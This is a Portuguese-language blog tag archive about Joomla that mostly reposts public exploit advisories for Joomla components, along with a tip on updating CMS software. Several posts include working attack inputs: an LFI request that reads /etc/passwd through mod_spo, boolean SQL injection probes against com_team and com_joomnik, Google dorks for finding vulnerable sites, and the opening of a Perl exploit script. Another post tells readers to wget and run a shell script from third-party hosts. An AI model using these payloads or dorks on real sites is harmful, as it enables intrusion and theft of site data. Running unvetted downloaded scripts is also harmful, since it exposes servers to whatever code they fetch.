Browsed by
Tag: joomla

Dica de segurança: Por que devo atualizar meu WordPress, Joomla, Drupal ou qualquer gestor de conteúdos web?

Dica de segurança: Por que devo atualizar meu WordPress, Joomla, Drupal ou qualquer gestor de conteúdos web?

Recentemente foi publicada na Icentral uma forma de inibir a frequência de ataques realizados a sites que usam Gestores de Conteúdos (mais conhecidos como CMS). A dica é simples e facilmente compreendida, recomendamos a leitura fortemente. Para acessar o conteúdo clique no link abaixo: http://icentral.com.br/blog/qual-motivo-de-atualizar-um-cms-no-meu-host-quer-seja-wordpress-joomla-drupal-e-etc/

Joomla Component (com_jdirectory) SQL Injection Vulnerability

Joomla Component (com_jdirectory) SQL Injection Vulnerability

===================================================================== .__ .__ __ .__ .___ ____ ___ _________ | | ____ |__|/ |_ |__| __| _/ _/ __ \\ \/ /\____ \| | / _ \| \ __\ ______ | |/ __ | \ ___/ > < | |_> > |_( ) || | /_____/ | / /_/ | \___ >__/\_ \| __/|____/\____/|__||__| |__\____ | \/ \/|__| \/ Exploit-ID is the Exploit Information Disclosure Web : exploit-id.com e-mail : root[at]exploit-id[dot]com ######################################### I’m Caddy-Dz, member of Exploit-Id ######################################### ====================================================================== ####…

Read More Read More

Joomla Component mod_spo SQL Injection Vulnerability

Joomla Component mod_spo SQL Injection Vulnerability

# Exploit Title: Simple Page Option LFI # Google Dork: inurl:mod_spo # Date: 15/07/2011 # Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca # Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip # Version: 1.5.x # Tested on: Backtrack and Windows 7 Simple Page Option – LFI Vulnerable-Code: $s_lang =& JRequest::getVar(‘spo_site_lang’); (file_exists(dirname(__FILE__).DS.’languages’.DS.$s_lang.’.php’)) ? include(dirname(__FILE__).DS.’languages’.DS.$s_lang.’.php’) : include(dirname(__FILE__).DS.’languages’.DS.’english.php’); Vulnerable-Var: spo_site_lang= Expl0iting: http://www.xxx.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using %20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se Reparing?: Just Filter with str_replace(); or htaccess protection to the vulnerable file. gr33tz: Alfredo Arauz, SeguridadBlanca.Blogspot.com, Ecuador and Perú Security.

Joomla Component JE K2 Story Submit Local File Inclusion Vulnerability

Joomla Component JE K2 Story Submit Local File Inclusion Vulnerability

#! /usr/bin/perl -w # Joomla Component JE Story Submit Local File Inclusion Vulnerability # Author : v3n0m # Date : July, 21-2011 GMT +7:00 Jakarta, Indonesia # Software : JE Story Submit # Vendor : http://joomlaextensions.co.in/ # License : GPLv2 or later # Tested On: Joomla 1.5.x # irc.yogyacarderlink.web.id – www.yogyacarderlink.web.id # # PoC – http://127.0.0.1/[path]/index.php?option=com_jesubmit&view=[LFI]%00 # use LWP::UserAgent; use HTTP::Request::Common; my ($host, $file) = @ARGV ; sub clear{ system(($^O eq ‘MSWin32’) ? ‘cls’ : ‘clear’); } clear(); print “|==========================================================|\n”;…

Read More Read More

Como verificar versões de CMS de maneira rápida e prática

Como verificar versões de CMS de maneira rápida e prática

Para verificar devemos baixar a seguinte ferramenta em um dos dois endereços abaixo: root@appunix:˜#wget http://server.cmsversion.com/checktest.sh ou root@appunix:˜#wget http://www.libphp.net/checktest.sh Em seguida fazer o seguinte root@appunix:˜#chmod +x checktest.sh root@appunix:˜#./checktest.sh -u logindeumacontanomeuserver A saída deverá assemelhar-se com: Latest Joomla: 1.5.23 Installed Version: 1.5.20 Installed Location: /home/logindeumacontanomeuserver/public_html/pathdocms/ Essa dica funciona para Joomla, WordPress, WHMCS e etc.

Joomla mdigg Component SQL Injection Vulnerability

Joomla mdigg Component SQL Injection Vulnerability

===================================================================== .__         .__  __            .__    .___ ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/ _/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ | \  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ | \___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ | \/      \/|__|                                          \/ Exploit-ID is the Exploit Information Disclosure Web             : exploit-id.com e-mail          : root[at]exploit-id[dot]com ######################################### I’m Caddy-Dz, member of Exploit-Id ######################################### ======================================================================…

Read More Read More

Joomla Component Calc Builder (id) Blind SQL Injection Vulnerability

Joomla Component Calc Builder (id) Blind SQL Injection Vulnerability

——————————————————————————— Joomla Component Calc Builder (id) Blind SQL Injection Vulnerability ——————————————————————————— Author : Chip D3 Bi0s Group : LatinHackTeam Email & msn : chipdebios[alt+64]gmail.com Date : 19 June 2011 Critical Lvl : Moderate Impact : Exposure of sensitive information Where : From Remote ————————————————————————— Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Calc Builder version : 0.0.1 Developer : Guillermo Santiago License : GPLv2 or later type : Commercial Date Added : 12 June 2011 Price : 9.90 € Demo : http://components.moonsoft.es/democalcbuilder…

Read More Read More

Joomla Component (com_team) SQL Injection Vulnerability

Joomla Component (com_team) SQL Injection Vulnerability

******************************************************************************** Joomla Component (com_team) SQL Injection Vulnerability ******************************************************************************** Author : CoBRa_21 Dork : inurl:com_team ******************************************************************************** Exploit http://localhost/[PATH]/print.php?task=person&id=36 and 1=1 http://localhost/[PATH]/print.php?task=person&id=36 and 1=2 http://localhost/[PATH]/print.php?task=person&id=36 [SQL] ******************************************************************************** Ordu-yu Lojistik TIM // CoBRa_21 ******************************************************************************** Fonte: http://www.exploit-db.com/exploits/17412/

Joomla Component com_joomnik SQL Injection Vulnerability

Joomla Component com_joomnik SQL Injection Vulnerability

  <——————- header data start ——————- > ############################################################# Joomla Component Joomnik Gallery SQL Injection Vulnerability ############################################################# # Author : SOLVER ~ Bug Researchers # Date : 26.05.2011 # Greetz : DreamPower – CWKOMANDO – Toprak – Equ – Err0r – 10line # Name : Joomla com_joomnik # Bug Type : SQL injection # Infection : Admin Login Bilgileri Alinabilir. # Example Vuln : [+]/index.php?option=com_joomnik&album=[EXPLOIT] [+] Dork:”com_joomnik” [+] Demo: http://site.com/index.php?option=com_joomnik&album=6′ # Bug Fix Advice : Zararli Karakterler Filtrenmelidir. ############################################################# http://joomlacode.org/gf/project/joomnik/